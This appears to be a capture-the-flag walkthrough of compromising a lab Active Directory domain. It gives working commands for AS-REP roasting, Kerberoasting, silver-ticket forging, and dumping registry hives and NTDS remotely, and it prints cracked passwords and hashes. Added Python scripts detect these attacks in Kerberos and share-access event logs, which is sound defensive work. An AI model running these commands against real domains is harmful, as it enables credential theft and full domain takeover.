Anonymous FTP on the DC to get usernames, then we AS-REP roast

cme ldap 10.10.211.85 -u loot/users.txt -p '' --asreproast loot/users.txt

ben.cox:Trinity1

Apparently he has remote access and can reverse a DPAPI-encrypted cred, but my WinRM didn’t work at all LMFAO

LUSMS\Administrator:XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF

we can also kerberoast

svc_web:iydgTvmujl6f
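Both roasting steps above (AS-REP roast of the pre-auth-disabled account, then Kerberoast of the SPN account) leave a trace on the DC: 4768 with PreAuthType 0 and 4769 TGS requests with RC4 (0x17) for a non-machine service account. The triage below is an added defensive example, not part of these notes; the event lines are constructed in a simplified key=value form (the field names come from the real 4768/4769 events, the layout does not), and the IPs are placeholders.

```python
"""Triage Kerberos 4768/4769 events for AS-REP roasting and Kerberoasting
indicators.  Added defensive example with constructed sample data."""
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample events (simplified key=value rendering, not real EVTX).
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=ben.cox PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.14.9",
    "EventID=4769 TargetUserName=ben.cox@LUSTROUS.VL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "EventID=4769 TargetUserName=alice@LUSTROUS.VL ServiceName=LUSDC$ TicketEncryptionType=0x12 IpAddress=10.10.14.9",
    "EventID=4769 TargetUserName=alice@LUSTROUS.VL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.9",
]

Finding = Tuple[str, str, str]  # (indicator, account, source ip)


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'key=value key=value' line into a dict (values contain no spaces here)."""
    return dict(kv.split("=", 1) for kv in line.split())


def triage(lines: List[str]) -> List[Finding]:
    """Return roasting indicators found in the given event lines.

    - 4768 with PreAuthType 0: the TGT was issued without pre-authentication,
      i.e. the account has DONT_REQ_PREAUTH set and its AS-REP is crackable.
    - 4769 with RC4 (0x17) for a service account that is neither a machine
      account (trailing $) nor krbtgt: classic Kerberoast request pattern.
    """
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        eid = ev.get("EventID")
        if eid == "4768" and ev.get("PreAuthType") == "0":
            findings.append(("asrep_roast_candidate", ev["TargetUserName"], ev["IpAddress"]))
        elif eid == "4769":
            svc = ev.get("ServiceName", "")
            rc4 = ev.get("TicketEncryptionType") == "0x17"
            if rc4 and not svc.endswith("$") and svc.lower() != "krbtgt":
                findings.append(("kerberoast_candidate", svc, ev["IpAddress"]))
    return findings


def requests_per_source(findings: List[Finding]) -> Dict[str, int]:
    """Count indicators per source IP; one host triggering both is a strong signal."""
    return dict(Counter(ip for _, _, ip in findings))


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
    print(requests_per_source(triage(SAMPLE_EVENTS)))
```

The mitigation side is the same two attributes the detection keys on: clear DONT_REQ_PREAUTH on any account that does not need it, and give SPN accounts long random passwords (or gMSAs) with AES-only encryption types so RC4 TGS requests stand out.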

Website uses Kerberos auth

USE FQDNS AND NTHASH FOR THE SERVICE ACCOUNT LMFAO

name doesn’t matter, only the id

impacket-ticketer -nthash E67AF8B3D78DF5A02EB0D57B6CB60717 -domain-sid S-1-5-21-2355092754-1584501958-1513963426 -domain lustrous.vl -spn HTTP/lusdc.lustrous.vl  -user-id 1114 svc_web
export KRB5CCNAME=svc_web.ccache
curl --negotiate -u : http://lusdc.lustrous.vl/Internal/

tony.ward:U_cPVQqEI50i1X

Backup Operator, no shell; we must dump remotely

git clone https://github.com/horizon3ai/backup_dc_registry
python3 reg.py lustrous.vl/tony.ward:[email protected] backup -p '\\lusdc.lustrous.vl\c$'
impacket-smbclient lustrous.vl/tony.ward:[email protected]
use c$
get SAM
get SYSTEM
get SECURITY
impacket-secretsdump -sam sam -system system -security security local
cme smb 10.10.220.245 -u 'LUSDC$' -H '002e2962bdcf6bdb49f4552b27c52116' --ntds
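The remote hive dump above (reg save via Backup Operators, then SAM/SYSTEM/SECURITY pulled off c$) is visible on the DC as 5145 share-access events against an admin share with hive file names as the target. The check below is an added defensive example, not part of these notes; the 5145 lines are constructed in a simplified key=value form (field names from the real event, layout is not), and the user, share and IP values are placeholders. It generalises past the page's exact case by also flagging hive paths under Windows\System32\config and ntds.dit reads through any admin share.

```python
"""Flag reads of registry hives / NTDS through administrative shares in
constructed 5145 (network share object access) events.  Added defensive
example; sample lines are constructed, not real captures."""
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample 5145 events (simplified key=value rendering).
SAMPLE_5145 = [
    r"EventID=5145 SubjectUserName=tony.ward ShareName=\\*\C$ RelativeTargetName=SAM AccessMask=0x120089 IpAddress=10.10.14.5",
    r"EventID=5145 SubjectUserName=tony.ward ShareName=\\*\C$ RelativeTargetName=SYSTEM AccessMask=0x120089 IpAddress=10.10.14.5",
    r"EventID=5145 SubjectUserName=tony.ward ShareName=\\*\C$ RelativeTargetName=Windows\System32\config\SECURITY AccessMask=0x120089 IpAddress=10.10.14.5",
    r"EventID=5145 SubjectUserName=alice ShareName=\\*\C$ RelativeTargetName=Users\alice\report.docx AccessMask=0x120089 IpAddress=10.10.14.9",
    r"EventID=5145 SubjectUserName=bob ShareName=\\*\Public RelativeTargetName=SAM AccessMask=0x120089 IpAddress=10.10.14.7",
]

# Admin shares: \\*\C$ (any drive letter) or \\*\ADMIN$.
ADMIN_SHARE = re.compile(r"\\\\\*\\(?:[A-Za-z]\$|ADMIN\$)$", re.IGNORECASE)
# Hive file names at any depth, plus ntds.dit; the path may be a saved copy
# (e.g. a Backup Operators reg save target), not only the live config dir.
HIVE_TARGET = re.compile(r"(?:^|\\)(?:SAM|SYSTEM|SECURITY|ntds\.dit)$", re.IGNORECASE)

Finding = Tuple[str, str, str, str]  # (user, share, target, source ip)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'key=value' line (sample values contain no spaces)."""
    return dict(kv.split("=", 1) for kv in line.split())


def flag_hive_reads(lines: List[str]) -> List[Finding]:
    """Return 5145 events where a hive-like file is touched via an admin share."""
    hits: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5145":
            continue
        share = ev.get("ShareName", "")
        target = ev.get("RelativeTargetName", "")
        if ADMIN_SHARE.search(share) and HIVE_TARGET.search(target):
            hits.append((ev["SubjectUserName"], share, target, ev["IpAddress"]))
    return hits


def summarise_by_user(findings: List[Finding]) -> Dict[str, int]:
    """How many hive files each account pulled; one account touching all
    three of SAM/SYSTEM/SECURITY is the offline secretsdump pattern."""
    return dict(Counter(user for user, _, _, _ in findings))


if __name__ == "__main__":
    found = flag_hive_reads(SAMPLE_5145)
    for f in found:
        print(f)
    print(summarise_by_user(found))
```

5145 only exists when "Audit Detailed File Share" is enabled, which is noisy on file servers but cheap on a DC; the complementary control is keeping Backup Operators empty (membership changes show up as 4732/4733) so SeBackupPrivilege is not available to a plain user in the first place.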